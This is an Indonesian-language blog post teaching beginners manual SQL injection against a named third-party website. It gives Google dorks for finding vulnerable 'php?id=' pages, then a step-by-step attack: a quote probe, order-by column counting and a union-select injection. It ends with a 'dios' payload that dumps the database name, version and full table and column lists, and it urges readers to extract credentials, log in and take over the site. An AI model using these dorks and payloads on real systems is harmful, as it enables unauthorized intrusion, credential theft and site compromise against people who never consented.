Assalamualaikum, karna ini blog baru jadi bakal gue isi dengan materi SQL Injection aja dulu...
Nah jadi apa itu SQL Injection? jadi SQL Injection itu adlah teknik mengeksploitasi web/aplikasi yang didalamnya menggunakan database untuk penyimpanan data
oke langsung aja ke tutorial nya...
yang diperlukan :
1. Browser
2. Dios (kalau ga punya cari ajg)
3. Dork
4. Segelas kopi dan udud tentunya
Dork :
- Inurl:"php?id=" intext:"gallery"
- Inurl:"php?id=" intext:"product"
- Inurl:"php?id=" intext:"news"
Target : https://ieitvm.org/news-detail.php?id=9
Nah pertama - tama kita kasih string ( ' ) untuk ngeliat web tersebut vuln SQLI atau ngga
https://ieitvm.org/news-detail.php?id=9'
Nah yang awal nya web aman - aman aja bakal blank atau berubah tulisannya, dan terkadang muncul tulisan "You have an eror in SQL syntax..."
kalau udah gitu tinggal tinggal balikin lagi web nya ke awal dengan cara +order+by
https://ieitvm.org/news-detail.php?id=9'+order+by+1--+-
Loh kok masih tetep eror?kalau masih eror hilangin string ( ' ). Kalau udah tinggal lu cari deh column yang eror, dengan cara ganti angka 1 pada order+by nya...
https://ieitvm.org/news-detail.php?id=9+order+by+6--+- ~> aman
https://ieitvm.org/news-detail.php?id=9+order+by+7--+- ~> aman
https://ieitvm.org/news-detail.php?id=9+order+by+8--+- ~> eror
Oke disini dapat column eror nya di angka 8, lanjut ke +union+select nyaa. Karna column nya cuma sampai angka 8 jadi tulis angka nya sampai 7 ajaa ygy...
https://ieitvm.org/news-detail.php?id=-9+union+select+1,2,3,4,5,6,7--+-
Nahh udah dapet deh no togel nya:3
tinggal kalian pasang aja dios nya di no yang tertera di website
Dios : concat(Nick Lu,%27<br>%27,%27<img src ="Link Gambar"%27,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
,version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7--+-){kind=link}
Okee ke dump deh database nya, tinggal dump u/p ~> login ~> trus ewe dah tu web nyaa (buat tutorial dump u/p nya next time yah)
Sekian materi SQL Injection dari gua, semoga bagi pemula paham yang gua jelasin ini Wassalamualaikum....
0 Komentar